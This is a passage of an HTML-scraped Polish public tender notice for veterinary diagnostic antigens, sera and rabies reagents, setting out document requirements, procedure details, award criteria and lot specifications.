mowa w art. 86 ust. 5 PZP, oświadczenia o przynależnościlub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 PZP.Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innymwykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku składania oferty wspólnej wskazane oświadczenie przedłożyć musi każdy z Wykonawcówwspólnie ubiegających się o udzielenie zamówienia. Dokumenty te należy złożyć w formie pisemnej,we wskazanym terminie, w siedzibie Zamawiającego. Dokumenty składane przez Wykonawcę,którego oferta zostanie najwyżej oceniona (składane na wezwanie Zamawiającego): Nie dotyczy.Forma dokumentów: 1. Dokumenty, o których mowa w pkt 6.1.1. SIWZ wykonawca składa w formiepisemnej (oryginał) lub kopii poświadczonych za zgodność z oryginałem przez notariusza (dotyczypełnomocnictwa) lub kopii poświadczonych za zgodność z oryginałem przez wykonawcę (dotyczywyciągów z odpowiednich rejestrów). 2. Dokument, o których mowa w pkt 6.1.2. SIWZ wykonawcaskłada w formie pisemnej (oryginał). 3. Pozostałe oświadczenia, o których mowa powyżej dotyczącewykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega wykonawca na zasadachokreślonych w art. 22a ustawy oraz dotyczące podwykonawców, składane są w formie pisemnej(oryginał). 4. Pozostałe dokumenty, poza wskazanymi w pkt 6.3.1-6.3.2 składane są w formiepisemnej (oryginał) lub kopii poświadczonej za zgodność z oryginałem. 5. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacjipolega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albopodwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 6. Poświadczenie za zgodnośćz oryginałem następuje w formie pisemnej lub w formie elektronicznej. 7. Dokumenty sporządzone wjęzyku obcym są składane wraz z tłumaczeniem na język polski.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena brutto wykonania zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>80,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Strony przewidują możliwość istotnej zmiany postanowień umowy poprzez zawarcie pisemnegoaneksu pod rygorem nieważności, w przypadku: a) zmiany terminu realizacji zamówienia poprzez jegoprzedłużenie ze względu na niezawinione przez Stronę przyczyny spowodowane przez tzw. siłę wyższą wrozumieniu § 3 umowy; b) zmiany określonego typu, modelu, nazwy, producenta przedmiotu umowybądź jego elementów, poprawy jakości lub innych parametrów charakterystycznych dla danego elementudostawy lub zmiany technologii na równoważną lub lepszą w szczególności w przypadku zakończeniajego produkcji lub wstrzymania lub wycofania go z produkcji po przedstawianiu stosownychdokumentów od producenta lub dystrybutora, z tym że cena wskazana w § 5 ust 1.nie może ulecpodwyższeniu, a parametry techniczne nie mogą być gorsze niż wskazane w treści oferty; c) Zmianywysokości wynagrodzenia wykonawcy, w przypadku zmian stawki podatku VAT lub innychpublicznoprawnych obciążeń, mających wpływ na wysokość zaoferowanej przez WYKONAWCĘ ceny.2. Zmiana umowy dokonana z naruszeniem ust. 1 jest nieważna. 3. Wszelkie zmiany i uzupełnienianiniejszej umowy oraz załączników, stanowiących integralną część umowy, wymagają pisemnego aneksu, pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-06-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa antygenów, surowic i komponentów do diagnostyki chorób zwierząt</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Antygen do diagnostyki Salmonella Pullorum gallinarum (aglutynacja płytowa)	4 op. 2	Antygen do diagnostyki Mycoplasma gallisepticum (aglutynacja płytowa)	6 op. 3	Antygen Brucella abortus do OKAP	40 op.4	Antygen Brucella spp. do OA	2 op.5	Antygen Brucella abortus do OWD	1 op.6	Antygen Trypanosoma equiperdum USA ( Dourine Complement CF antigen )	2 op.7	Antygen Burgholderia mallei	3 op.8	Surowica kontrolna dodatnia do Zarazy Stadniczej USA ( Dourine Positive Control )	2 op.9	Surowica kontrolna dodatnia do Nosacizny	2 op.10	Surowica kontrolna dodatnia do diagnostyki Mycoplasma gallisepticum SS+	3 op. 11	Surowica kontrolna ujemna do diagnostyki Mycoplasma gallisepticum SS-	3 op. 12	Surowica wzorcowa dodatnia do choroby Aujeszkyego	1 op.13	Surowica wzorcowa ujemna do choroby Aujeszkyego	20 op.14	Surowica hemolityczna - liofilizat 4 op.15	Dopełniacz do OWD - liofilizat 7 op.16	Roboczy standard surowicy anty Brucella abortus do OWD	1 op.17	Roboczy standard surowicy anty Brucella abortus do OA	2 op.18	Koniugat do diagnostyki wścieklizny, monoclonalny Anti- Rabies FITC, rownoważny do Sifin PA 1202 wykrywający RV, RRV, EBL1 i EBL2	3 op.19	Surowica do diagnostyki Salmonella spp. HM	8 op. 20	Surowica do diagnostyki Salmonella spp. AO	1 op.21	Surowica do diagnostyki Salmonella spp. A-I+Vi	1 op.22	Surowica poliwalentna do diagnostyki Salmonella spp. I, J, K, M, N	2 op.23	Surowica do diagnostyki Salmonella spp. B0	6 op.24	Surowica do diagnostyki Salmonella spp. CO	6 op.25	Surowica do diagnostyki Salmonella spp. DO	5 op.26	Surowica do diagnostyki Salmonella spp. EO	2 op.27	Surowica do diagnostyki Salmonella spp. O 1,3,19	4 op.28	Surowica do diagnostyki Salmonella spp. O4	4 op.29	Surowica do diagnostyki Salmonella spp. O5	2 op.30	Surowica do diagnostyki Salmonella spp. 06	3 op.31	Surowica do diagnostyki Salmonella spp. O 6,7	3 op.32	Surowica do diagnostyki Salmonella spp. O7	3 op.33	Surowica do diagnostyki Salmonella spp. O8	4 op.34	Surowica do diagnostyki Salmonella spp. O8, 20	3 op.35	Surowica do diagnostyki Salmonella spp. O9	3 op.36	Surowica do diagnostyki Salmonella spp. O10	2 op.37	Surowica do diagnostyki Salmonella spp. O11	3 op.38	Surowica do diagnostyki Salmonella spp.014 2 op.39	Surowica do diagnostyki Salmonella spp. O15 konserwowana azydkiem sodu	1 op.40	Surowica do diagnostyki Salmonella spp. O19 konserwowana azydkiem sodu	1 op.41	Surowica do diagnostyki Salmonella spp. 027 konserwowana azydkiem sodu	1 op.42	Surowica do diagnostyki Salmonella spp. O46 konserwowana azydkiem sodu.	3 op.43	Surowica do diagnostyki Salmonella spp. O46 konserwowana azydkiem sodu.	2 op.44	Surowica do diagnostyki Salmonella spp. Ha	3 op.45	Surowica poliwalentna do diagnostyki Salmonella spp. Ha, b, c, d, i, z10	2 op.46	Surowica do diagnostyki Salmonella spp. Hb konserwowana azydkiem sodu 3 op.47	Surowica do diagnostyki Salmonella spp. Hc konserwowana azydkiem sodu.	3 op.48	Surowica do diagnostyki Salmonella spp. Hd konserwowana azydkiem sodu.	3 op.49	Surowica do diagnostyki Salmonella spp. He konserwowana azydkiem sodu.	2 op.50	Surowica do diagnostyki Salmonella spp. Henx 2 op.51	Surowica do diagnostyki Salmonella spp. Hf konserwowana azydkiem sodu.	2 op.52	Surowica do diagnostyki Salmonella spp. Hg konserwowana azydkiem sodu.	2 op.53	Surowica do diagnostyki Salmonella spp. Hh konserwowana azydkiem sodu.	2 op.54	Surowica do diagnostyki Salmonella spp. Hi 1 op.55	Surowica do diagnostyki Salmonella spp. Hi konserwowana azydkiem sodu.	3 op.56	Surowica do diagnostyki Salmonella spp. Hk	3 op.57	Surowica do diagnostyki Salmonella spp. HL konserwowana azydkiem sodu.	2 op.58	Surowica do diagnostyki Salmonella spp. Hm	5 op.59	Surowica do diagnostyki Salmonella spp. Hn konserwowana azydkiem sodu.	3 op.60	Surowica do diagnostyki Salmonella spp. Hp	3 op.61	Surowica do diagnostyki Salmonella spp. Hq	5 op.62	Surowica do diagnostyki Salmonella spp. Hr konserwowana azydkiem sodu.	3 op.63	Surowica do diagnostyki Salmonella spp. Hs	3 op.64	Surowica do diagnostyki Salmonella spp. Ht	3 op.65	Surowica do diagnostyki Salmonella spp. Hu	3 op.66	Surowica do diagnostyki Salmonella spp. Hw	3 op.67	Surowica do diagnostyki Salmonella spp. Hv	3 op.68	Surowica do diagnostyki Salmonella spp. Hx	3 op.69	Surowica do diagnostyki Salmonella spp. Hy konserwowana azydkiem sodu.	2 op.70	Surowica do diagnostyki Salmonella spp. Hz konserwowana azydkiem sodu	2 op.71	Surowica do diagnostyki Salmonella spp. H 1,2,5	1 op.72	Surowica do diagnostyki Salmonella spp. H2 konserwowana azydkiem sodu 3 op.73	Surowica do diagnostyki Salmonella spp. H5 konserwowana azydkiem sodu	3 op.74	Surowica do diagnostyki Salmonella spp. H6 konserwowana azydkiem sodu	3 op.75	Surowica do diagnostyki Salmonella spp. H7 konserwowana azydkiem sodu	3 op.76	Surowica do diagnostyki Salmonella spp. Hz6	5 op.77	Surowica do diagnostyki Salmonella spp. Hz10 konserwowana azydkiem sodu	3 op.78	Surowica do diagnostyki Salmonella spp. Hz13 konserwowana azydkiem sodu	1 op.79	Surowica do diagnostyki Salmonella spp. Hz15	3 op.80	Surowica do diagnostyki Salmonella spp. Hz23	2 op.81	Surowica do diagnostyki Salmonella spp. Hz24	2 op.82	Surowica do diagnostyki Salmonella spp. Hz28	2 op.83	Surowica do diagnostyki Salmonella spp. Hz35	2 op.84	Surowica do diagnostyki Salmonella spp. Hz38	2 op.85	Surowica do diagnostyki Salmonella spp. Hz39 konserwowana azydkiem sodu.	1 op.86	Surowica poliwalentna do diagnostyki Salmonella spp. Hz29,z35,z38,z39,z41,z42 konserwowana azydkiem sodu	2 op.87	Surowica do diagnostyki Salmonella spp. Hqstpu konserwowana azydkiem sodu	3 op.88	Surowica do diagnostyki Salmonella spp. Hg konserwowana azydkiem sodu.	1 op.89	Surowica do diagnostyki Salmonella spp. 1,2,5,6,7,z6 konserwowana azydkiem sodu	2 op.90	Surowica do diagnostyki Salmonella spp. klrzyZ4 konserwowana azydkiem sodu	1 op.91	Surowica do diagnostyki Salmonella spp. g,m,t konserwowana azydkiem sodu	1 op.92	Surowica do diagnostyki Salmonella spp. O4	3 op.93	Surowica do diagnostyki Salmonella spp. O7	3 op.94	Surowica do diagnostyki Salmonella spp. O9	3 op.95	Surowica do diagnostyki Salmonella spp. O12 konserwowana azydkiem sodu.	1 op.Warunki wykonania zamówienia:1.	Do każdej partii towaru winien być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ).2.	Do każdej partii antygenów do diagnostyki metodą OWD, OA winny być załączone certyfikaty jakości z określeniem miana odczynników.3.	Wymagany termin ważności dla odczynników wymienionych w pozycjach:•	3, 4, 5, 9 – minimum 6 miesięcy od daty dostawy do laboratorium.•	1, 2, 6, 7, 8, 12, 13, 14, 15, 16, 17, 18 – minimum 12 miesięcy od daty dostawy do laboratorium.•	10, 11, 19-95 – minimum 18 miesięcy od daty dostawy do laboratorium.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa odczynników do diagnostyki wścieklizny</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Liofilizowany koniugat do diagnostyki wścieklizny	40 op.Warunki wykonania zamówienia:1.	Do każdej partii towaru winien być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ).2.	Wymagany termin ważności dla odczynników – minimum 12 miesięcy od daty dostawy do laboratorium.3.	Transport odczynników musi spełniać wymogi przewidziane przez producenta szczególnie w zakresie wymaganej temperatury przechowywania.4.	Koniugat do diagnostyki wścieklizny winien spełniać następujące wymagania:a) możliwość barwienia wygaszającego koniugatu błękitem Evansa w celu uzyskania lepszego kontrastu obrazu immunofluorescencyjnego, b) koniugat poliklonalny skierowany przeciwko nukleokapsydowi wirusa wścieklizny.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia	</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE 